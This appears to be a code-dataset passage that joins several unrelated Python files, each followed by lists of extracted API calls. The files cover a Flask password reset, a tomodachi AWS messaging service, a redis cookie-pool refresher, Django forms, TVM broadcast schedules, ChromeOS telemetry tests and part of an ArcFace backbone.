log.info(f"Password reset requested for '{user.username}'")
# generate a token that can reset their password
expires = datetime.timedelta(hours=1)
reset_token = create_access_token(
{"id": str(user.id)}, expires_delta=expires
)
self.mail.send_email(
"password reset",
sender="<EMAIL>",
recipients=[user.email],
text_body=render_template("mail/reset_password_token.txt",
token=reset_token),
html_body=render_template("mail/reset_password_token.html",
token=reset_token)
)
return ret
| [
"logging.getLogger",
"flask.render_template",
"vantage6.server.db.User.get",
"vantage6.server.db.User.get_by_email",
"pathlib.Path",
"vantage6.server.db.User.get_by_username",
"flask_jwt_extended.decode_token",
"flask.request.get_json",
"vantage6.common.logger_name",
"datetime.timedelta"
] | [((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\n', (505, 515), False, 'from vantage6.common import logger_name\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\n', (539, 552), False, 'import logging\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1593, 1595), False, 'from flask import request, render_template\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', (['user_id'], {}), '(user_id)\n', (2105, 2114), False, 'from vantage6.server import db\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2878, 2880), False, 'from flask import request, render_template\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (3600, 3609), False, 'import datetime\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['"""swagger/post_reset_password.yaml"""'], {}), "('swagger/post_reset_password.yaml')\n", (1358, 1394), False, 'from pathlib import Path\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['"""swagger/post_recover_password.yaml"""'], {}), "('swagger/post_recover_password.yaml')\n", (2472, 2510), False, 'from pathlib import Path\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\n', (3237, 3247), False, 'from vantage6.server import db\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\n', (3309, 3316), False, 'from vantage6.server import db\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.txt"""'], {'token': 'reset_token'}), "('mail/reset_password_token.txt', token=reset_token)\n", (3884, 3936), False, 'from flask import request, render_template\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.html"""'], {'token': 'reset_token'}), "('mail/reset_password_token.html', token=reset_token)\n", (4013, 4066), False, 'from flask import request, render_template\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\n')] |
import os
from typing import Any, Callable, Dict
import tomodachi
from tomodachi import aws_sns_sqs, aws_sns_sqs_publish
from tomodachi.discovery import AWSSNSRegistration
from tomodachi.envelope import JsonBase
async def middleware_function(
func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any
) -> Any:
# Functionality before function is called
service.log("middleware before")
return_value = await func(*args, **kwargs)
    # There's also the possibility to pass in extra arguments or keyword arguments, for example:
# return_value = await func(*args, id='overridden', **kwargs)
    # Functionality after the function is called
service.log("middleware after")
return return_value
class ExampleAWSSNSSQSService(tomodachi.Service):
name = "example-aws-sns-sqs-service"
log_level = "INFO"
uuid = str(os.environ.get("SERVICE_UUID") or "")
# Build own "discovery" functions, to be run on start and stop
# See tomodachi/discovery/aws_sns_registration.py for example
discovery = [AWSSNSRegistration]
# The message envelope class defines how a message should be processed when sent and received
# See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata
message_envelope = JsonBase
# Adds a middleware function that is run on every incoming message.
# Several middlewares can be chained.
message_middleware = [middleware_function]
# Some options can be specified to define credentials, used ports, hostnames, access log, etc.
options = {
"aws_sns_sqs": {
"region_name": None, # specify AWS region (example: 'eu-west-1')
"aws_access_key_id": None, # specify AWS access key (example: '<KEY>')
"aws_secret_access_key": None, # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA')
},
"aws_endpoint_urls": {
"sns": None, # For example 'http://localhost:4575' if localstack is used for testing
"sqs": None, # For example 'http://localhost:4576' if localstack is used for testing
},
}
@aws_sns_sqs("example-route1")
async def route1a(self, data: Any) -> None:
self.log('Received data (function: route1a) - "{}"'.format(data))
async def _started_service(self) -> None:
async def publish(data: Any, topic: str) -> None:
self.log('Publish data "{}"'.format(data))
await aws_sns_sqs_publish(self, data, topic=topic, wait=False)
await publish("友達", "example-route1")
| [
"tomodachi.aws_sns_sqs_publish",
"os.environ.get",
"tomodachi.aws_sns_sqs"
] | [((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['"""example-route1"""'], {}), "('example-route1')\n", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['"""SERVICE_UUID"""'], {}), "('SERVICE_UUID')\n", (905, 921), False, 'import os\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n')] |
# -*- coding: utf-8 -*-
# @Author: GXR
# @CreateTime: 2022-01-20
# @UpdateTime: 2022-01-20
import redis
import config
import cookie_login
from cookie_api import app
red = redis.Redis(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.REDIS_DB,
decode_responses=True,
)
# Refresh the number of cookies
def cookie_refresh():
while 1:
cookie_list = red.smembers(config.REDIS_KEY_COOKIE)
if len(cookie_list) >= config.COOKIE_COUNT:
break
cookie_login.run_cookie_login(1)
    app.logger.info("[cookie count OK]-[%s]" % len(cookie_list))
def run_cookie_refresh():
cookie_refresh()
if __name__ == "__main__":
run_cookie_refresh()
| [
"cookie_login.run_cookie_login",
"redis.Redis"
] | [((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\n REDIS_DB, decode_responses=True)\n', (185, 281), False, 'import redis\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\n', (513, 516), False, 'import cookie_login\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# start tutorial
from django.db import models
from djng.forms import NgModelFormMixin, NgFormValidationMixin
from djng.styling.bootstrap3.forms import Bootstrap3ModelForm
class SubscribeUser(models.Model):
full_name = models.CharField(
"<NAME>",
max_length=99)
avatar = models.ImageField("Avatar", blank=False, null=True)
permit = models.FileField("Permit", blank=True, null=True)
class SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm):
use_required_attribute = False
scope_prefix = 'subscribe_data'
form_name = 'my_form'
class Meta:
model = SubscribeUser
fields = ['full_name', 'avatar', 'permit']
| [
"django.db.models.ImageField",
"django.db.models.FileField",
"django.db.models.CharField"
] | [((288, 329), 'django.db.models.CharField', 'models.CharField', (['"""<NAME>"""'], {'max_length': '(99)'}), "('<NAME>', max_length=99)\n", (304, 329), False, 'from django.db import models\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['"""Avatar"""'], {'blank': '(False)', 'null': '(True)'}), "('Avatar', blank=False, null=True)\n", (378, 412), False, 'from django.db import models\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['"""Permit"""'], {'blank': '(True)', 'null': '(True)'}), "('Permit', blank=True, null=True)\n", (443, 476), False, 'from django.db import models\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Compute and schedule for add, multiply, subtract slice op
Please note the following assumptions made by the implementation:
1) The inputs will be multiples of the crouton layout except for the axis that needs broadcasting."""
from tvm import te
from tvm import tir
from tvm import topi
from ..utils import get_layout_transform_fn
def add_broadcast_compute(input_a, input_b):
"""Call the add op from topi"""
return topi.add(input_a, input_b)
def subtract_broadcast_compute(input_a, input_b):
"""Call the subtract op from topi"""
return topi.subtract(input_a, input_b)
def multiply_broadcast_compute(input_a, input_b):
"""Call the multiply op from topi"""
return topi.multiply(input_a, input_b)
def tir_broadcast_schedule(
out_m,
input_a,
input_b,
output_layout: str,
input_a_layout: str,
input_b_layout: str,
op_name: str,
):
"""Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast"""
func = te.create_prim_func([input_a, input_b, out_m])
s = tir.Schedule(func)
block_dict = {"add": "T_add", "subtract": "T_subtract", "multiply": "T_multiply"}
block = s.get_block(block_dict[op_name])
if input_a_layout == "nhwc-8h2w32c2w-2d":
input_a_transformed_layout = get_layout_transform_fn(input_a_layout)
s.transform_layout(block, buffer=("read", 0), index_map=input_a_transformed_layout)
if input_b_layout == "nhwc-8h2w32c2w-2d":
input_b_transformed_layout = get_layout_transform_fn(input_b_layout)
s.transform_layout(block, buffer=("read", 1), index_map=input_b_transformed_layout)
output_transformed_layout = get_layout_transform_fn(output_layout)
s.transform_layout(block, buffer=("write", 0), index_map=output_transformed_layout)
n, h, w, c = s.get_loops(block)
h_o, h_i = s.split(h, [None, 8])
w_o, w_i = s.split(w, [None, 4])
c_o, c_i = s.split(c, [None, 32])
wio, wii = s.split(w_i, [None, 2])
s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii)
fused = s.fuse(c_i, wii)
s.vectorize(fused)
return s
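A minimal usage sketch (the shapes, dtype, and layout strings below are illustrative assumptions, not taken from this file): build two placeholder tensors, form an elementwise add, and apply the broadcast schedule.
a = te.placeholder((1, 8, 8, 32), dtype="float16", name="input_a")
b = te.placeholder((1, 8, 8, 32), dtype="float16", name="input_b")
out = add_broadcast_compute(a, b)
# Layout strings are assumed examples; anything accepted by get_layout_transform_fn works.
sched = tir_broadcast_schedule(
    out, a, b,
    output_layout="nhwc-8h2w32c2w-2d",
    input_a_layout="nhwc-8h2w32c2w-2d",
    input_b_layout="nhwc-8h2w32c2w-2d",
    op_name="add",
)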
| [
"tvm.topi.add",
"tvm.tir.Schedule",
"tvm.te.create_prim_func",
"tvm.topi.subtract",
"tvm.topi.multiply"
] | [((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1282, 1300), False, 'from tvm import topi\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1423, 1441), False, 'from tvm import topi\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1564, 1582), False, 'from tvm import topi\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\n', (1875, 1902), False, 'from tvm import te\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\n', (1926, 1932), False, 'from tvm import tir\n')] |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import os
import unittest
from telemetry.core import browser_finder
from telemetry.core import exceptions
from telemetry.core import extension_to_load
from telemetry.core import util
from telemetry.core.backends.chrome import cros_interface
from telemetry.unittest import options_for_unittests
class CrOSAutoTest(unittest.TestCase):
def setUp(self):
options = options_for_unittests.GetCopy()
self._cri = cros_interface.CrOSInterface(options.cros_remote,
options.cros_ssh_identity)
self._is_guest = options.browser_type == 'cros-chrome-guest'
self._username = '' if self._is_guest else options.browser_options.username
self._password = options.browser_options.password
def _IsCryptohomeMounted(self):
"""Returns True if cryptohome is mounted"""
cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome',
'--action=status'])
cryptohomeStatus = json.loads(cryptohomeJSON)
return (cryptohomeStatus['mounts'] and
cryptohomeStatus['mounts'][0]['mounted'])
def _CreateBrowser(self, autotest_ext=False, auto_login=True):
"""Finds and creates a browser for tests. if autotest_ext is True,
also loads the autotest extension"""
options = options_for_unittests.GetCopy()
if autotest_ext:
extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext')
self._load_extension = extension_to_load.ExtensionToLoad(
path=extension_path,
browser_type=options.browser_type,
is_component=True)
options.extensions_to_load = [self._load_extension]
browser_to_create = browser_finder.FindBrowser(options)
self.assertTrue(browser_to_create)
options.browser_options.create_browser_with_oobe = True
options.browser_options.auto_login = auto_login
b = browser_to_create.Create()
b.Start()
return b
def _GetAutotestExtension(self, browser):
"""Returns the autotest extension instance"""
extension = browser.extensions[self._load_extension]
self.assertTrue(extension)
return extension
def _GetLoginStatus(self, browser):
extension = self._GetAutotestExtension(browser)
self.assertTrue(extension.EvaluateJavaScript(
"typeof('chrome.autotestPrivate') != 'undefined'"))
extension.ExecuteJavaScript('''
window.__login_status = null;
chrome.autotestPrivate.loginStatus(function(s) {
window.__login_status = s;
});
''')
return util.WaitFor(
lambda: extension.EvaluateJavaScript('window.__login_status'), 10)
def testCryptohomeMounted(self):
"""Verifies cryptohome mount status for regular and guest user and when
logged out"""
with self._CreateBrowser() as b:
self.assertEquals(1, len(b.tabs))
self.assertTrue(b.tabs[0].url)
self.assertTrue(self._IsCryptohomeMounted())
chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user')
self.assertTrue(chronos_fs)
if self._is_guest:
self.assertEquals(chronos_fs, 'guestfs')
else:
home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path',
'user', self._username])
self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()),
chronos_fs)
self.assertFalse(self._IsCryptohomeMounted())
self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'),
'/dev/mapper/encstateful')
def testLoginStatus(self):
"""Tests autotestPrivate.loginStatus"""
with self._CreateBrowser(autotest_ext=True) as b:
login_status = self._GetLoginStatus(b)
self.assertEquals(type(login_status), dict)
self.assertEquals(not self._is_guest, login_status['isRegularUser'])
self.assertEquals(self._is_guest, login_status['isGuest'])
self.assertEquals(login_status['email'], self._username)
self.assertFalse(login_status['isScreenLocked'])
def _IsScreenLocked(self, browser):
return self._GetLoginStatus(browser)['isScreenLocked']
def _LockScreen(self, browser):
self.assertFalse(self._IsScreenLocked(browser))
extension = self._GetAutotestExtension(browser)
self.assertTrue(extension.EvaluateJavaScript(
"typeof chrome.autotestPrivate.lockScreen == 'function'"))
logging.info('Locking screen')
extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();')
logging.info('Waiting for the lock screen')
def ScreenLocked():
return (browser.oobe and
browser.oobe.EvaluateJavaScript("typeof Oobe == 'function'") and
browser.oobe.EvaluateJavaScript(
"typeof Oobe.authenticateForTesting == 'function'"))
util.WaitFor(ScreenLocked, 10)
self.assertTrue(self._IsScreenLocked(browser))
def _AttemptUnlockBadPassword(self, browser):
logging.info('Trying a bad password')
def ErrorBubbleVisible():
return not browser.oobe.EvaluateJavaScript('''
document.getElementById('bubble').hidden
''')
self.assertFalse(ErrorBubbleVisible())
browser.oobe.ExecuteJavaScript('''
Oobe.authenticateForTesting('%s', 'bad');
''' % self._username)
util.WaitFor(ErrorBubbleVisible, 10)
self.assertTrue(self._IsScreenLocked(browser))
def _UnlockScreen(self, browser):
logging.info('Unlocking')
browser.oobe.ExecuteJavaScript('''
Oobe.authenticateForTesting('%s', '%s');
''' % (self._username, self._password))
util.WaitFor(lambda: not browser.oobe, 10)
self.assertFalse(self._IsScreenLocked(browser))
def testScreenLock(self):
"""Tests autotestPrivate.screenLock"""
with self._CreateBrowser(autotest_ext=True) as browser:
self._LockScreen(browser)
self._AttemptUnlockBadPassword(browser)
self._UnlockScreen(browser)
def testLogout(self):
"""Tests autotestPrivate.logout"""
with self._CreateBrowser(autotest_ext=True) as b:
extension = self._GetAutotestExtension(b)
try:
extension.ExecuteJavaScript('chrome.autotestPrivate.logout();')
except (exceptions.BrowserConnectionGoneException,
exceptions.BrowserGoneException):
pass
util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20)
def _SwitchRegion(self, region):
self._cri.RunCmdOnDevice(['stop', 'ui'])
# Change VPD (requires RW-enabled firmware).
# To save time, region and initial_timezone are not set.
vpd = {'initial_locale': region.language_code,
'keyboard_layout': region.keyboard}
for (key, value) in vpd.items():
self._cri.RunCmdOnDevice(['vpd', '-s', '"%s"="%s"' % (key, value)])
# Remove cached files to clear initial locale info and force regeneration.
self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\ State'])
self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed'])
self._cri.RunCmdOnDevice(['dump_vpd_log', '--force'])
self._cri.RunCmdOnDevice(['start', 'ui'])
def _OobeHasOption(self, browser, selectId, value):
hasOptionJs = '''
// Check that the option is present, and selected if it is the default.
(function hasOption(selectId, value, isDefault) {
var options = document.getElementById(selectId).options;
for (var i = 0; i < options.length; i++) {
if (options[i].value == value) {
// The option is present. Make sure it's selected if necessary.
return !isDefault || options.selectedIndex == i;
}
}
return false;
})("%s", "%s", %s);
'''
return browser.oobe.EvaluateJavaScript(
hasOptionJs % (selectId, value, 'true'))
def _ResolveLanguage(self, locale):
# If the locale matches a language but not the country, fall back to
# an existing locale. See ui/base/l10n/l10n_util.cc.
lang, _, region = map(str.lower, locale.partition('-'))
if not region:
return ""
# Map from other countries to a localized country
if lang == 'es' and region == 'es':
return 'es-419'
if lang == 'zh':
if region in ('hk', 'mo'):
return 'zh-TW'
return 'zh-CN'
if lang == 'en':
if region in ('au', 'ca', 'nz', 'za'):
return 'en-GB'
return 'en-US'
# No mapping found
return ""
def testOobeLocalization(self):
"""Tests different region configurations at OOBE"""
# Save the original device localization settings.
# To save time, only read initial_locale and keyboard_layout.
initial_region = self.Region('', '', '', '', '')
initial_region.language_code, _ = self._cri.RunCmdOnDevice(
['vpd', '-g', 'initial_locale'])
initial_region.keyboard, _ = self._cri.RunCmdOnDevice(
['vpd', '-g', 'keyboard_layout'])
for region in self.REGIONS_LIST:
self._SwitchRegion(region)
with self._CreateBrowser(auto_login=False) as browser:
# Ensure the dropdown lists have been created.
util.WaitFor(lambda: browser.oobe.EvaluateJavaScript(
'document.getElementById("language-select") != null'),
10)
# Find the language, or an acceptable fallback value.
languageFound = self._OobeHasOption(browser,
'language-select',
region.language_code)
if not languageFound:
fallback = self._ResolveLanguage(region.language_code)
self.assertTrue(fallback and
self._OobeHasOption(browser,
'language-select',
fallback))
# Find the keyboard layout.
self.assertTrue(self._OobeHasOption(
browser, 'keyboard-select', region.keyboard))
# Test is finished. Restore original region settings.
self._SwitchRegion(initial_region)
# The Region class and region list will be available in regions.py.
class Region(object):
def __init__(self, region_code, keyboard, time_zone, language_code,
keyboard_mechanical_layout, description=None, notes=None):
self.region_code = region_code
self.keyboard = keyboard
self.time_zone = time_zone
self.language_code = language_code
self.keyboard_mechanical_layout = keyboard_mechanical_layout
self.description = description or region_code
self.notes = notes
class Enum(frozenset):
def __getattr__(self, name):
if name in self:
return name
raise AttributeError
KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2'])
_KML = KeyboardMechanicalLayout
REGIONS_LIST = [
Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI,
'Australia'),
Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI,
'Canada (US keyboard)',
'Canada with US (ANSI) keyboard; see http://goto/cros-canada'),
Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO,
'Canada (French keyboard)',
('Canadian French (ISO) keyboard. The most common configuration for '
'Canadian French SKUs. See http://goto/cros-canada')),
Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO,
'Canada (hybrid)',
('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), '
'defaulting to English language and keyboard. Used only if there '
'needs to be a single SKU for all of Canada. See '
'http://goto/cros-canada')),
Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA',
_KML.ISO, 'Canada (multilingual)',
("Canadian Multilingual keyboard; you probably don't want this. See "
"http://goto/cros-canada")),
Region('de', 'xkb:de::ger', 'Europe/Berlin', 'de', _KML.ISO, 'Germany'),
Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'),
Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'),
Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'),
Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO,
'Ireland'),
Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'),
Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI,
'Malaysia'),
Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI,
'Netherlands'),
Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO,
'Nordics',
('Unified SKU for Sweden, Norway, and Denmark. This defaults '
'to Swedish keyboard layout, but starts with US English language '
'for neutrality. Use if there is a single combined SKU for Nordic '
'countries.')),
Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden',
("Use this if there separate SKUs for Nordic countries (Sweden, "
"Norway, and Denmark), or the device is only shipping to Sweden. "
"If there is a single unified SKU, use 'nordic' instead.")),
Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI,
'Singapore'),
Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI,
'United States'),
]
| [
"json.loads",
"telemetry.core.browser_finder.FindBrowser",
"telemetry.core.backends.chrome.cros_interface.CrOSInterface",
"telemetry.core.util.WaitFor",
"os.path.dirname",
"telemetry.unittest.options_for_unittests.GetCopy",
"telemetry.core.extension_to_load.ExtensionToLoad",
"logging.info"
] | [((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\n', (1189, 1205), False, 'import json\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\n', (1906, 1915), False, 'from telemetry.core import browser_finder\n'), ((4602, 4632), 'logging.info', 'logging.info', (['"""Locking screen"""'], {}), "('Locking screen')\n", (4614, 4632), False, 'import logging\n'), ((4714, 4757), 'logging.info', 'logging.info', (['"""Waiting for the lock screen"""'], {}), "('Waiting for the lock screen')\n", (4726, 4757), False, 'import logging\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\n', (5022, 5040), False, 'from telemetry.core import util\n'), ((5149, 5186), 'logging.info', 'logging.info', (['"""Trying a bad password"""'], {}), "('Trying a bad password')\n", (5161, 5186), False, 'import logging\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\n', (5524, 5548), False, 'from telemetry.core import util\n'), ((5645, 5670), 'logging.info', 'logging.info', (['"""Unlocking"""'], {}), "('Unlocking')\n", (5657, 5670), False, 'import logging\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\n', (5827, 5858), False, 'from telemetry.core import util\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\n .browser_type, is_component=True)\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1600, 1610), False, 'import os\n')] |
import sqlite3
class Database:
def get_connection(self):
return sqlite3.connect("./db.sqlite")
def add_card(self, card_title, card_text, card_link_text, card_link_url):
con = self.get_connection()
cur = con.cursor()
create_table_query = "CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR," + \
" 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )"
        # Parameterized query: values are bound safely instead of being interpolated
        # into the SQL string, so text values do not need manual quoting.
        insert_data_query = "INSERT INTO cards VALUES (?, ?, ?, ?)"
        try:
            cur.execute(create_table_query)
            cur.execute(insert_data_query,
                        (card_title, card_text, card_link_text, card_link_url))
            con.commit()
        except sqlite3.Error as error:
            print("an error has occurred:", error)
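A short usage sketch (the card values below are hypothetical, for illustration only):
db = Database()
db.add_card("Example title", "Example card text", "Read more", "https://example.com")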
| [
"sqlite3.connect"
] | [((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['"""./db.sqlite"""'], {}), "('./db.sqlite')\n", (93, 108), False, 'import sqlite3\n')] |
import subprocess
subprocess.Popen(['sh', '../Switches/Switch3_On.sh'])
| [
"subprocess.Popen"
] | [((18, 71), 'subprocess.Popen', 'subprocess.Popen', (["['sh', '../Switches/Switch3_On.sh']"], {}), "(['sh', '../Switches/Switch3_On.sh'])\n", (34, 71), False, 'import subprocess\n')] |
from collections import namedtuple
import torch
from torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d,
Module, PReLU, ReLU, Sequential, Sigmoid)
# yapf: disable
"""
ArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa
"""
# yapf: enable
class Flatten(Module):
"""Flatten Module."""
def forward(self, input):
return input.view(input.size(0), -1)
def l2_norm(input, axis=1):
"""l2 normalization.
Args:
input (torch.Tensor): The input tensor.
axis (int, optional): Specifies which axis of input to calculate the
norm across. Defaults to 1.
Returns:
Tensor: Tensor after L2 normalization per-instance.
"""
norm = torch.norm(input, 2, axis, True)
output = torch.div(input, norm)
return output
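A small illustration of the default axis semantics (the tensor sizes are assumptions for illustration):
embeddings = torch.randn(4, 512)
normalized = l2_norm(embeddings)  # each row (axis=1) is scaled to unit L2 norm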
class Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])):
"""A named tuple describing a ResNet block."""
def get_block(in_channel, depth, num_units, stride=2):
"""Get a single block config.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
num_units (int): Number of unit modules.
stride (int, optional): Conv2d stride. Defaults to 2.
Returns:
list: A list of unit modules' config.
"""
return [Bottleneck(in_channel, depth, stride)
] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)]
def get_blocks(num_layers):
"""Get block configs of backbone.
Args:
num_layers (int): Number of ConvBlock layers in backbone.
Raises:
ValueError: `num_layers` must be one of [50, 100, 152].
Returns:
list: A list of block configs.
"""
if num_layers == 50:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=4),
get_block(in_channel=128, depth=256, num_units=14),
get_block(in_channel=256, depth=512, num_units=3)
]
elif num_layers == 100:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=13),
get_block(in_channel=128, depth=256, num_units=30),
get_block(in_channel=256, depth=512, num_units=3)
]
elif num_layers == 152:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=8),
get_block(in_channel=128, depth=256, num_units=36),
get_block(in_channel=256, depth=512, num_units=3)
]
else:
raise ValueError(
'Invalid number of layers: {}. Must be one of [50, 100, 152]'.
format(num_layers))
return blocks
class SEModule(Module):
"""Squeeze-and-Excitation Modules.
Args:
channels (int): Input channels.
reduction (int): Intermediate channels reduction ratio.
"""
def __init__(self, channels, reduction):
super(SEModule, self).__init__()
self.avg_pool = AdaptiveAvgPool2d(1)
self.fc1 = Conv2d(
channels,
channels // reduction,
kernel_size=1,
padding=0,
bias=False)
self.relu = ReLU(inplace=True)
self.fc2 = Conv2d(
channels // reduction,
channels,
kernel_size=1,
padding=0,
bias=False)
self.sigmoid = Sigmoid()
def forward(self, x):
"""Forward Function."""
module_input = x
x = self.avg_pool(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.sigmoid(x)
return module_input * x
class bottleneck_IR(Module):
"""Intermediate Resblock of bottleneck.
Args:
in_channel (int): Input channels.
